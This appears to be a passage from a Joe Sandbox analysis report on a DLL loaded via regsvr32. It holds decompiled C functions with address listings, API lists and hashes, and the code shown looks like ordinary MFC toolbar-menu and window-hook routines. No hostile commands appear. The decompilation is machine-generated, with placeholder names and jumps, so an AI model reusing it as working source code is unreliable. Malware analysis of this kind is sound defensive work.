							_t351 = _t351 - 1;
							 *(_t358 + 0x74) = _t351;
							SendMessageA( *(_t342 + 0x20), 0x41d, _t351, _t358 - 0x80);
							_t195 = IntersectRect(_t358 - 0x90, _t358 - 0x1c, _t358 - 0x80);
							__eflags = _t195;
							if(_t195 != 0) {
								break;
							}
							__eflags = _t351;
							if(_t351 > 0) {
								continue;
							}
							break;
						}
						_t352 = 0x30;
						E10049170(_t342, _t358 - 0x70, 0, _t352);
						 *(_t358 - 0x70) = _t352;
						_t343 = E1003541E(_t342);
						E1003C2E3(_t358 + 0x3c);
						 *((intOrPtr*)(_t358 + 0x3c)) = 0x1009e49c;
						_t353 =  *(_t358 + 0x74);
						 *(_t358 - 4) = 6;
						E1003C30A(_t358 + 0x3c,  *(_t358 + 0x58) - _t353, 0xffffffff);
						E1001E54F(_t358, _t198, _t358, CreatePopupMenu());
						E1000D064(_t358 + 0x28, _t358 - 0x30);
						_t269 = 0;
						__eflags = _t353 -  *(_t358 + 0x58);
						if(__eflags >= 0) {
							L27:
							CopyRect(_t358 - 0x40,  *(_t358 + 0x24));
							E1000C931( *((intOrPtr*)(_t358 + 0x60)), _t358 - 0x40);
							_t354 = 0;
							E10012A40(_t358, __eflags, 0,  *(_t358 - 0x40),  *((intOrPtr*)(_t358 - 0x34)),  *((intOrPtr*)(_t358 + 0x60)), 0);
							__eflags = _t269;
							 *((intOrPtr*)( *((intOrPtr*)(_t358 + 0x78)))) = 0;
							if(__eflags <= 0) {
								L31:
								 *(_t358 - 4) = 5;
								E1003C2FA(_t358 + 0x3c);
								 *(_t358 - 4) = 4;
								L1000CDC3(_t269, _t358 - 0x30, _t343, _t354, __eflags);
								 *(_t358 - 4) = 3;
								L1000CD56(_t358 + 0x28);
								L100013E3( *((intOrPtr*)(_t358 + 0x5c)) + 0xfffffff0, _t336);
								L100013E3( *((intOrPtr*)(_t358 + 0x70)) + 0xfffffff0, _t336);
								 *(_t358 - 4) = 0;
								E1001E680(_t269, _t358, _t343, _t354, __eflags);
								_t348 = 1;
								goto L6;
							} else {
								goto L28;
							}
							do {
								L28:
								_t318 =  *(E1003524D(_t358 + 0x3c, _t354));
								__eflags = _t318;
								if(_t318 != 0) {
									 *((intOrPtr*)( *_t318 + 4))(1);
								}
								_t354 = _t354 + 1;
								__eflags = _t354 - _t269;
							} while (__eflags < 0);
							goto L31;
						} else {
							goto L14;
						}
						do {
							L14:
							E1003E06B( *(_t358 + 0x20), _t336, __eflags,  *(_t358 + 0x74), _t358 + 0x54, _t358 + 0x38, _t358 + 0x50);
							__eflags =  *(_t358 + 0x38) & 0x00000001;
							if(( *(_t358 + 0x38) & 0x00000001) != 0) {
								__eflags = _t269;
								if(_t269 == 0) {
									goto L26;
								}
								 *((intOrPtr*)(_t358 - 0x6c)) = 0x100;
								 *((intOrPtr*)(_t358 - 0x68)) = 0x800;
								L25:
								InsertMenuItemA( *(_t358 + 4),  *(_t358 + 0x74), 1, _t358 - 0x70);
								goto L26;
							}
							 *((intOrPtr*)(_t358 - 0x6c)) = 0x162;
							L10001276(_t358 + 0x70,  *((intOrPtr*)(_t358 + 0x54)));
							E1001FB1B(_t358 + 0x5c,  *((intOrPtr*)(_t358 + 0x70)), 1, 0xa);
							_t232 = E10009F14(__eflags, 8);
							__eflags = _t232;
							if(_t232 == 0) {
								_t232 = 0;
								__eflags = 0;
							} else {
								 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
								 *_t232 = 0x10098d24;
							}
							E1003C4E9(_t269, _t358 + 0x3c, _t358, _t269, _t232);
							L10036D80(_t358 + 0x3c,  *((intOrPtr*)(_t343 + 4)),  *((intOrPtr*)(_t358 + 0x50)), _t358 - 0xb0);
							CopyRect(_t358 + 0x10, _t358 - 0xa0);
							OffsetRect(_t358 + 0x10,  ~( *(_t358 + 0x10)),  ~( *(_t358 + 0x14)));
							E10035296( *(E1003524D(_t358 + 0x3c, _t269)), _t358 - 0x30,  *((intOrPtr*)(_t358 + 0x18)),  *((intOrPtr*)(_t358 + 0x1c)));
							_t246 =  *(E1003524D(_t358 + 0x3c, _t269));
							__eflags = _t246;
							if(_t246 != 0) {
								_t246 =  *(_t246 + 4);
							}
							_t247 = E1000D0A1( *((intOrPtr*)(_t358 + 0x2c)), _t246);
							 *(E1003524D(_t358 + 0x3c, _t269)) = _t247;
							E1001FBA9(_t358 + 0x28, _t358 + 0x10, GetSysColor(4));
							L10036D9E(_t343, _t358 + 0x28,  *((intOrPtr*)(_t358 + 0x50)), 0, 0, 1);
							_t256 =  *(E1003524D(_t358 + 0x3c, _t269));
							__eflags = _t256;
							if(_t256 != 0) {
								_t256 =  *(_t256 + 4);
							}
							_t257 = E1000D0A1( *((intOrPtr*)(_t358 + 0x2c)), _t256);
							 *(E1003524D(_t358 + 0x3c, _t269)) = _t257;
							 *((intOrPtr*)(_t358 - 0x4c)) =  *((intOrPtr*)(_t358 + 0x5c));
							 *((intOrPtr*)(_t358 - 0x60)) =  *((intOrPtr*)(_t358 + 0x54));
							 *((intOrPtr*)(_t358 - 0x68)) = 0x100;
							 *(_t358 - 0x50) =  *(E1003524D(_t358 + 0x3c, _t269));
							_t269 = _t269 + 1;
							goto L25;
							L26:
							 *(_t358 + 0x74) =  *(_t358 + 0x74) + 1;
							__eflags =  *(_t358 + 0x74) -  *(_t358 + 0x58);
						} while (__eflags < 0);
						goto L27;
					}
					_t369 =  *((intOrPtr*)(_t358 + 0x60)) - _t159;
					if( *((intOrPtr*)(_t358 + 0x60)) == _t159) {
						goto L7;
					}
					_t348 = E10037781(_t267, _t159, _t336, lstrlenA, _t347, _t369,  *((intOrPtr*)(_t358 + 0x70)), _t347,  *((intOrPtr*)(_t358 + 0x78)));
					goto L6;
				}
			}




























                                                                                                                0x10037781
                                                                                                                0x10037781
                                                                                                                0x10037785
                                                                                                                0x1003778f
                                                                                                                0x10037794
                                                                                                                0x100377a0
                                                                                                                0x100377a5
                                                                                                                0x100377ab
                                                                                                                0x100377af
                                                                                                                0x100377b9
                                                                                                                0x100377be
                                                                                                                0x100377c4
                                                                                                                0x100377ca
                                                                                                                0x100377d5
                                                                                                                0x100377e5
                                                                                                                0x100377ef
                                                                                                                0x10037c7d
                                                                                                                0x10037c7d
                                                                                                                0x10037834
                                                                                                                0x1003783a
                                                                                                                0x10037844
                                                                                                                0x10037853
                                                                                                                0x10037853
                                                                                                                0x100377f5
                                                                                                                0x100377fa
                                                                                                                0x00000000
                                                                                                                0x10037814
                                                                                                                0x10037816
                                                                                                                0x1003781d
                                                                                                                0x10037856
                                                                                                                0x10037859
                                                                                                                0x1003785e
                                                                                                                0x1003786b
                                                                                                                0x10037870
                                                                                                                0x1003787d
                                                                                                                0x10037885
                                                                                                                0x10037889
                                                                                                                0x1003788e
                                                                                                                0x10037894
                                                                                                                0x10037898
                                                                                                                0x100378b0
                                                                                                                0x100378b6
                                                                                                                0x100378ba
                                                                                                                0x100378c4
                                                                                                                0x100378ce
                                                                                                                0x100378e0
                                                                                                                0x100378e3
                                                                                                                0x100378ee
                                                                                                                0x10037900
                                                                                                                0x1003790b
                                                                                                                0x1003791b
                                                                                                                0x10037925
                                                                                                                0x1003792d
                                                                                                                0x1003792f
                                                                                                                0x10037c43
                                                                                                                0x10037c46
                                                                                                                0x10037c4a
                                                                                                                0x10037c52
                                                                                                                0x10037c56
                                                                                                                0x10037c61
                                                                                                                0x10037c69
                                                                                                                0x10037c6c
                                                                                                                0x10037c74
                                                                                                                0x10037c78
                                                                                                                0x00000000
                                                                                                                0x10037c78
                                                                                                                0x10037935
                                                                                                                0x10037937
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037949
                                                                                                                0x1003794b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037954
                                                                                                                0x10037954
                                                                                                                0x10037959
                                                                                                                0x10037960
                                                                                                                0x10037963
                                                                                                                0x1003796e
                                                                                                                0x1003797a
                                                                                                                0x1003797c
                                                                                                                0x1003797f
                                                                                                                0x10037983
                                                                                                                0x1003798d
                                                                                                                0x10037990
                                                                                                                0x100379a1
                                                                                                                0x100379a7
                                                                                                                0x100379a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100379ab
                                                                                                                0x100379ad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100379ad
                                                                                                                0x100379b1
                                                                                                                0x100379b9
                                                                                                                0x100379c3
                                                                                                                0x100379ce
                                                                                                                0x100379d0
                                                                                                                0x100379d5
                                                                                                                0x100379df
                                                                                                                0x100379ea
                                                                                                                0x100379ee
                                                                                                                0x100379fd
                                                                                                                0x10037a09
                                                                                                                0x10037a0e
                                                                                                                0x10037a10
                                                                                                                0x10037a13
                                                                                                                0x10037ba3
                                                                                                                0x10037baa
                                                                                                                0x10037bb7
                                                                                                                0x10037bbc
                                                                                                                0x10037bcc
                                                                                                                0x10037bd1
                                                                                                                0x10037bd6
                                                                                                                0x10037bd8
                                                                                                                0x10037bf5
                                                                                                                0x10037bf8
                                                                                                                0x10037bfc
                                                                                                                0x10037c04
                                                                                                                0x10037c08
                                                                                                                0x10037c10
                                                                                                                0x10037c14
                                                                                                                0x10037c1f
                                                                                                                0x10037c2a
                                                                                                                0x10037c32
                                                                                                                0x10037c36
                                                                                                                0x10037c3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037bda
                                                                                                                0x10037bda
                                                                                                                0x10037be3
                                                                                                                0x10037be5
                                                                                                                0x10037be7
                                                                                                                0x10037bed
                                                                                                                0x10037bed
                                                                                                                0x10037bf0
                                                                                                                0x10037bf1
                                                                                                                0x10037bf1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037a19
                                                                                                                0x10037a19
                                                                                                                0x10037a2b
                                                                                                                0x10037a30
                                                                                                                0x10037a34
                                                                                                                0x10037b70
                                                                                                                0x10037b72
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037b74
                                                                                                                0x10037b7b
                                                                                                                0x10037b82
                                                                                                                0x10037b8e
                                                                                                                0x00000000
                                                                                                                0x10037b8e
                                                                                                                0x10037a40
                                                                                                                0x10037a47
                                                                                                                0x10037a57
                                                                                                                0x10037a5e
                                                                                                                0x10037a63
                                                                                                                0x10037a66
                                                                                                                0x10037a74
                                                                                                                0x10037a74
                                                                                                                0x10037a68
                                                                                                                0x10037a68
                                                                                                                0x10037a6c
                                                                                                                0x10037a6c
                                                                                                                0x10037a7b
                                                                                                                0x10037a8d
                                                                                                                0x10037a9d
                                                                                                                0x10037ab3
                                                                                                                0x10037ace
                                                                                                                0x10037adc
                                                                                                                0x10037ade
                                                                                                                0x10037ae0
                                                                                                                0x10037ae2
                                                                                                                0x10037ae2
                                                                                                                0x10037ae9
                                                                                                                0x10037afb
                                                                                                                0x10037b0b
                                                                                                                0x10037b1f
                                                                                                                0x10037b2d
                                                                                                                0x10037b2f
                                                                                                                0x10037b31
                                                                                                                0x10037b33
                                                                                                                0x10037b33
                                                                                                                0x10037b3a
                                                                                                                0x10037b4a
                                                                                                                0x10037b4f
                                                                                                                0x10037b59
                                                                                                                0x10037b5c
                                                                                                                0x10037b6a
                                                                                                                0x10037b6d
                                                                                                                0x00000000
                                                                                                                0x10037b94
                                                                                                                0x10037b94
                                                                                                                0x10037b9a
                                                                                                                0x10037b9a
                                                                                                                0x00000000
                                                                                                                0x10037a19
                                                                                                                0x1003781f
                                                                                                                0x10037822
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10037832
                                                                                                                0x00000000
                                                                                                                0x10037832

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1003778F
                                                                                                                • lstrlenA.KERNEL32(ReBarWindow32,00000000,000000F4), ref: 100377B5
                                                                                                                • GetClassNameA.USER32(?,00000000,00000001), ref: 100377CA
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                • SendMessageA.USER32 ref: 100378CE
                                                                                                                • SendMessageA.USER32 ref: 100378E3
                                                                                                                • lstrlenA.KERNEL32(ToolbarWindow32), ref: 100378EA
                                                                                                                • GetClassNameA.USER32(?,00000000,00000001), ref: 10037900
                                                                                                                • SendMessageA.USER32 ref: 10037990
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 100379A1
                                                                                                                • _memset.LIBCMT ref: 100379B9
                                                                                                                • CreatePopupMenu.USER32 ref: 100379F3
                                                                                                                • CopyRect.USER32(?,?), ref: 10037A9D
                                                                                                                • OffsetRect.USER32 ref: 10037AB3
                                                                                                                • GetSysColor.USER32 ref: 10037AFD
                                                                                                                • InsertMenuItemA.USER32 ref: 10037B8E
                                                                                                                • CopyRect.USER32(?,?), ref: 10037BAA
                                                                                                                  • Part of subcall function 1000CDC3: __EH_prolog3.LIBCMT ref: 1000CDCA
                                                                                                                  • Part of subcall function 1000CDC3: ReleaseDC.USER32(?,00000000), ref: 1000CDE7
                                                                                                                  • Part of subcall function 1000CD56: DeleteDC.GDI32(00000000), ref: 1000CD68
                                                                                                                  • Part of subcall function 1001E680: __EH_prolog3.LIBCMT ref: 1001E687
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$H_prolog3MessageSend$ClassCopyMenuNamelstrlen$ColorCreateDeleteInsertIntersectItemOffsetPopupRelease_memset_strlen
                                                                                                                • String ID: P$ReBarWindow32$ToolbarWindow32
                                                                                                                • API String ID: 891312130-460576549
                                                                                                                • Opcode ID: a3bd144e737abe0645fe1da6afaf55057a275fc0ba90bc7761989e3142a9a979
                                                                                                                • Instruction ID: b4c68f327188d744d22f3c9931f261ee9d8a14f523f27da6a36b721c5d26d668
                                                                                                                • Opcode Fuzzy Hash: a3bd144e737abe0645fe1da6afaf55057a275fc0ba90bc7761989e3142a9a979
                                                                                                                • Instruction Fuzzy Hash: 3CF18B75900248AFDF16DFA4CC85EEE7BA8FF04341F104119F91AAB2A2DB70EA44CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001603B Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1001603B(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E100476B6(0x1008ea86, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x1000a083);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10020A61(_t94, 0x100bdc04, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1000A069(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1001E302(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x100bdecc;
						if( *0x100bdecc == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x100bdba4;
								if( *0x100bdba4 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x100bdba4; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E10015EF7);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E10049170(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E100124BF(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x100bdba4 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E1004BFE6(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1001E397(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1001402B(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E100149C7);
							__eflags = _t83 - E100149C7;
							if(_t83 != E100149C7) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1001D714();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E1001286D(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E10047739(_t94, _t105, _t110);
				}
			}



























                                                                                                                0x1001603b
                                                                                                                0x1001603b
                                                                                                                0x1001603b
                                                                                                                0x10016045
                                                                                                                0x1001604a
                                                                                                                0x1001604d
                                                                                                                0x10016050
                                                                                                                0x1001605a
                                                                                                                0x10016060
                                                                                                                0x10016067
                                                                                                                0x10016069
                                                                                                                0x1001606c
                                                                                                                0x10016072
                                                                                                                0x10016074
                                                                                                                0x10016076
                                                                                                                0x10016076
                                                                                                                0x1001607f
                                                                                                                0x10016094
                                                                                                                0x10016096
                                                                                                                0x10016099
                                                                                                                0x1001609e
                                                                                                                0x100160a0
                                                                                                                0x100160a4
                                                                                                                0x100160aa
                                                                                                                0x100160c1
                                                                                                                0x100160c1
                                                                                                                0x100160c8
                                                                                                                0x10016115
                                                                                                                0x10016115
                                                                                                                0x10016117
                                                                                                                0x1001617f
                                                                                                                0x10016187
                                                                                                                0x100161c3
                                                                                                                0x100161cf
                                                                                                                0x100161d6
                                                                                                                0x10016208
                                                                                                                0x1001620b
                                                                                                                0x10016211
                                                                                                                0x10016213
                                                                                                                0x10016216
                                                                                                                0x1001621e
                                                                                                                0x10016225
                                                                                                                0x10016227
                                                                                                                0x10016229
                                                                                                                0x10016230
                                                                                                                0x10016238
                                                                                                                0x1001623a
                                                                                                                0x1001623d
                                                                                                                0x10016240
                                                                                                                0x1001624e
                                                                                                                0x1001624e
                                                                                                                0x1001623d
                                                                                                                0x10016229
                                                                                                                0x10016254
                                                                                                                0x1001625a
                                                                                                                0x10016266
                                                                                                                0x1001626c
                                                                                                                0x10016273
                                                                                                                0x10016275
                                                                                                                0x1001627a
                                                                                                                0x10016280
                                                                                                                0x10016280
                                                                                                                0x10016280
                                                                                                                0x10016280
                                                                                                                0x00000000
                                                                                                                0x10016284
                                                                                                                0x00000000
                                                                                                                0x100161d8
                                                                                                                0x1001618b
                                                                                                                0x10016196
                                                                                                                0x100161a1
                                                                                                                0x100161a7
                                                                                                                0x100161ad
                                                                                                                0x100161ae
                                                                                                                0x100161b0
                                                                                                                0x100161b8
                                                                                                                0x100161bb
                                                                                                                0x100161c1
                                                                                                                0x100161e7
                                                                                                                0x100161ed
                                                                                                                0x100161ef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100161f9
                                                                                                                0x100161fd
                                                                                                                0x10016202
                                                                                                                0x10016206
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016206
                                                                                                                0x00000000
                                                                                                                0x100161c1
                                                                                                                0x1001611f
                                                                                                                0x10016124
                                                                                                                0x1001612b
                                                                                                                0x10016134
                                                                                                                0x1001614a
                                                                                                                0x1001614c
                                                                                                                0x10016152
                                                                                                                0x10016154
                                                                                                                0x10016156
                                                                                                                0x10016156
                                                                                                                0x1001615e
                                                                                                                0x10016162
                                                                                                                0x10016166
                                                                                                                0x1001616a
                                                                                                                0x10016170
                                                                                                                0x10016173
                                                                                                                0x10016175
                                                                                                                0x10016175
                                                                                                                0x00000000
                                                                                                                0x1001616a
                                                                                                                0x100160cd
                                                                                                                0x100160d3
                                                                                                                0x100160d8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100160de
                                                                                                                0x100160e1
                                                                                                                0x100160e6
                                                                                                                0x100160f3
                                                                                                                0x100160f7
                                                                                                                0x100160fd
                                                                                                                0x100160fd
                                                                                                                0x10016106
                                                                                                                0x1001610b
                                                                                                                0x1001610e
                                                                                                                0x1001610f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001610f
                                                                                                                0x100160ac
                                                                                                                0x100160b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100160b9
                                                                                                                0x100160bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016081
                                                                                                                0x10016089
                                                                                                                0x10016286
                                                                                                                0x1001628b
                                                                                                                0x1001628b

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10016045
                                                                                                                  • Part of subcall function 10020A61: __EH_prolog3.LIBCMT ref: 10020A68
                                                                                                                • CallNextHookEx.USER32 ref: 10016089
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • GetClassLongA.USER32(?,000000E6), ref: 100160CD
                                                                                                                • GlobalGetAtomNameA.KERNEL32 ref: 100160F7
                                                                                                                • SetWindowLongA.USER32 ref: 1001614C
                                                                                                                • _memset.LIBCMT ref: 10016196
                                                                                                                • GetClassLongA.USER32(?,000000E0), ref: 100161C6
                                                                                                                • GetClassNameA.USER32(?,?,00000100), ref: 100161E7
                                                                                                                • GetWindowLongA.USER32(?,000000FC), ref: 1001620B
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 10016225
                                                                                                                • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 10016230
                                                                                                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 10016238
                                                                                                                • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 10016240
                                                                                                                • SetWindowLongA.USER32 ref: 1001624E
                                                                                                                • CallNextHookEx.USER32 ref: 10016266
                                                                                                                • UnhookWindowsHookEx.USER32 ref: 1001627A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                                • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                • API String ID: 1191297049-4034971020
                                                                                                                • Opcode ID: 4e41d8bc3767c021b246338e12286f8aa2d02b8d6f8887c17fdb326e8de98a25
                                                                                                                • Instruction ID: 4bde84d923aef39c465868793b08f59cf9dd9610db53f90e5a7fdac53ca2e90d
                                                                                                                • Opcode Fuzzy Hash: 4e41d8bc3767c021b246338e12286f8aa2d02b8d6f8887c17fdb326e8de98a25
                                                                                                                • Instruction Fuzzy Hash: 1061E035901626ABEB20DB60CD49BDE7BB8EF09365F110194F60AEB191DB34D9C4CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10001069 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E10001069(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				void* _t133;
				void* _t135;
				void* _t136;
				void* _t140;
				struct HWND__** _t145;
				struct HWND__** _t147;
				void* _t148;
				void* _t151;
				signed int _t152;
				void* _t154;
				char* _t157;

				_t154 = __eflags;
				_t133 = __edx;
				_t103 = __ecx;
				_push(0xffffffff);
				_push(0x1008da6b);
				_push( *[fs:0x0]);
				_t152 = _t151 - 0x14;
				_push(_t135);
				_t46 =  *0x100b9e70; // 0xbb35530
				_push(_t46 ^ _t152);
				 *[fs:0x0] = _t152 + 0x28;
				_t140 = __ecx;
				E1001BAAC(__ecx, _t135);
